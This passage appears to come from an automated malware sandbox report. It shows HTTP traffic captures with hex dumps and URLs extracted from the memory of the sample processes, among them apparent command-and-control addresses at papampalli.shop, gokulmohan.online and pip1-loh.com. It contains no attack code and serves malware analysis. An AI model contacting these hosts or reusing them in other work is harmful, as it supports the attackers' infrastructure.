3b 2a 9e 63 db 36 10 56 73 23 20 a0 9f 81 3c 29 94 12 92 86 94 cf 0d cc 05 df c6 22 05 41 6a fd 7d ae 4c 98 a1 2a 68 1c 42 69 ac a9 97 4f 00 52 1e 8f ee 09 ce 89 a7 af Data Ascii: -!ZMXZ{|Qs@v%2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:55:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pF8gyx8BgWQvl6njJX8RtKkdzdNWi8UJOfjKSfQK3evL9M9XZyETjwUCNpeSOxxdeF3BTuNzo5fUWN7AoDJUnfay7yTRcRC4hAK0rKn2cc2jhq%2BgwIUWWgZvFftDAC2Goi4T7oE7Uw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded22b86aa40c17-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=606&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 f4 49 ec 44 60 d4 Data Ascii: 2d3To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2ID`
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:55:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRFEoabB8Hv3riI7m0DsKcR5gvkEiEgVoAf%2FpMxfp1%2BP9pPaSOgu8SnIiR5Ikm0pat40sACAGJ6tUZffhpPaa9Jum4uuYXm1nTeASd6y%2FVlYHcRxZQ2DBG0juZl%2FnYoOVwy0SCzVbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded22c8b82447af-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 76 32 7f 9c 03 Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~rv2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:55:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ULdGMbCLzBB8DifIneHL5xWL6ghBSLJQnVmV%2FcPIF81TcLeayqHEbckrdbLEpsaeQvxZr3XPJrAqrEoF%2B363%2F7Hved3arWUZ2NVpo1YQOCrE%2FwB6I4FS8xMBem3L4e1Z%2BJx3xO76Jg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded22d90b228789-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10708&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 b4 d4 4d bb 31 9a a4 91 46 bb 89 49 03 26 56 04 7b f4 92 6b 6c 48 ec 60 5f d3 86 89 ff 1d 39 c9 da 4e fc 7a c1 79 b1 ef be fb be 3b fb 2e f1 93 f9 fb d9 e2 f6 fa 1c 04 95 05 5c 7f 7c 7d 75 39 03 cf 67 ec d3 78 c6 d8 7c 31 87 cf 6f 16 6f af 20 18 0c e1 86 8c 4c 89 b1 f3 77 1e 78 82 a8 0a 19 5b af d7 83 f5 78 a0 4d ce 16 1f d8 c6 b1 04 2e ac df fa b6 8d 19 64 94 79 c9 41 dc 8a 6c ca 42 d9 e9 6f 08 82 c9 64 d2 c5 79 0e 14 16 5c e5 53 0f 95 07 db 5d 12 0b e4 59 72 00 00 10 93 a4 02 93 e3 e1 31 3c 2b 33 6e 45 04 ef 34 c1 85 5e a9 2c 66 9d b3 03 96 48 1c 9c 9e 8f df 56 b2 9e 7a 33 ad 08 15 f9 8b a6 42 0f d2 ee 34 f5 08 37 c4 9c 7e 04 a9 e0 c6 22 4d 3f 2e 2e fc 57 1e db 27 52 bc c4 a9 97 a1 4d 8d ac 48 6a b5 c7 70 a3 8d 69 8e a0 e2 39 82 d2 04 4b 97 cc 36 dc 52 53 20 50 53 61 af 95 5a eb 75 3e b7 ee 74 d6 c0 fd 52 2b f2 ad fc 8e 61 70 5c 6d 22 48 75 a1 4d 78 78 da ae 08 5a f7 92 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae c2 14 15 a1 89 7e 6c 39 45 f0 88 f1 d5 70 8f 72 32 39 3b 3d bb 88 a0 e4 26 97 2a 84 d3 61 b5 81 a1 fb f6 09 46 70 df e1 e1 70 7e fe 72 Data Ascii: 2c8To0~_qdM1FI&V{klH`_9Nzy;.\|}u9gx|1oo Lwx[xM.dyAlBody\S]Yr1<+3nE4^,fHVz3B47~"M?..W'RMHjpi9K6RS PSaZu>tR+ap\m"HuMxxZhBn$/"pT>/d~l9Epr29;=&*aFpp~r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:55:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 29 Aug 2024 18:03:22 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u16ROvnUPrlzsorWDte7SiCsVBtaHpQDr%2FqD7s4Rm28Sb3Dw95aI%2FD2IbGTCBWV4UJffXhS9XYizULmnZDhcEWiIJUNmu19uRm7oaDRrPkJmW1a1NEZ0Z8%2F4c%2F8GV6feRrUu8iK5TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded22e8e9d07d5d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=338&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 Data Ascii: 583<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 11:56:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGkzJSlWz5J7rARLMDU4NJmweb%2FGo0YWkHjb%2BTkMmVWpyn%2FPkYSmm2MfS6Fqzb7Jw6UQYb%2B77WNI6pNIfx9OS0obF9pQcbFOtGUufDztJE31qr%2BSrjzD7jqyZFaskXV7AywM7DSmUWk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded236219e7e91a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1778&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=609&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 11:56:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqP8vLcSVEuO36QxxgDOsWNPw5LI%2Bg1jkahbvmWtM7Pt0ptLM51fVUjjwaWbDmaTjc3KnD1UEaktQEXcsNGwf7qdqieS59bAjOGSb2A0QIE3%2FfeHIw%2BA%2B6hJNVrUDH49jNdB3qpJTxo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ded2374b8b28d26-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=629&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,
                Source: fc.exe, 00000007.00000002.4135576349.0000000004B58000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.0000000003F48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VF
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000043FE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://pip1-loh.com/
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4136828393.000000000504D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gokulmohan.online
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4136828393.000000000504D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gokulmohan.online/ut59/
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: fc.exe, 00000007.00000003.2288824428.0000000007B7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: fc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
